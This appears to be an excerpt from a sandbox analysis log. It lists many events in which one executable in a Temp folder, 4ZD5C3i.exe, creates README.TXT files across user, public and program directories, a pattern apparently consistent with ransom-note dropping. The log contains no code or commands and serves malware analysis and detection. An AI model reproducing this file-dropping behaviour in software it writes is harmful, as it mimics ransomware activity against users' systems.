                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\setup\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\mozilla maintenance service\logs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\AccountPictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Desktop\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Documents\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Downloads\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Libraries\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Music\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Pictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Videos\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Desktop\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Documents\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Downloads\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Favorites\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Links\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Music\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\OneDrive\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Pictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Saved Games\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Videos\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Geshi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Prettify\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\COM\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\SciTE\api\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\.ms-ad\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\3D Objects\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Contacts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Downloads\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Favorites\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Links\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Music\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\OneDrive\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Pictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Recent\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Saved Games\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Searches\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Videos\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Aut2Exe\Icons\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Client\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Licenses\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Licenses16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\loc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office15\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\rsodWoW6432\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vreg\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\amd64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ar\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\arm64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\as-IN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\Assets\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\az-Latn-AZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\bg\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\bn-IN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\bs-Latn-BA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\Bundle\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ca\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ca-Es-VALENCIA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\cs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\cy-GB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\da\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\de\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\el\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\en\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\en-GB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\en-US\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\es\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\et\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\eu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\fa\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\fi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\fil-PH\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\fr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ga-IE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\gd\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\gl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\gu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\he\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\hi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\hr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\hu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\id\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ig-NG\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\imageformats\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\IRMProtectors\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\is\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\it\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ja\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ka\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\kk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\km-KH\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\kn\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ko\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\kok\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ku-Arab\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\lb-LU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\LogoImages\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\lt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\lv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mi-NZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ml-in\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mn\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ms\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mt-MT\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\nb-NO\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ne-NP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\nl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\nn-NO\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\nso-ZA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\or-IN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pa\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pa-Arab-PK\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\platforms\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pt-BR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pt-PT\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\qml\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\quc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\quz-PE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ro\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ru\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\rw\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sourcemaps\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\SparsePackage\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sq\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sr-Cyrl-BA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sr-Cyrl-RS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sr-Latn-RS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ta\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\te\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tg\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ti\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tn-ZA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tzdata\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ug\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\uk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ur\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\vi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\wo\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\xh-ZA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\yo-NG\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\zh-CN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\zh-TW\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\setup\logs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\catalog\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win7\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win8\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Esl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Crimson\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Notepad++\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\PSPad\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\TextPad\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\README.TXT
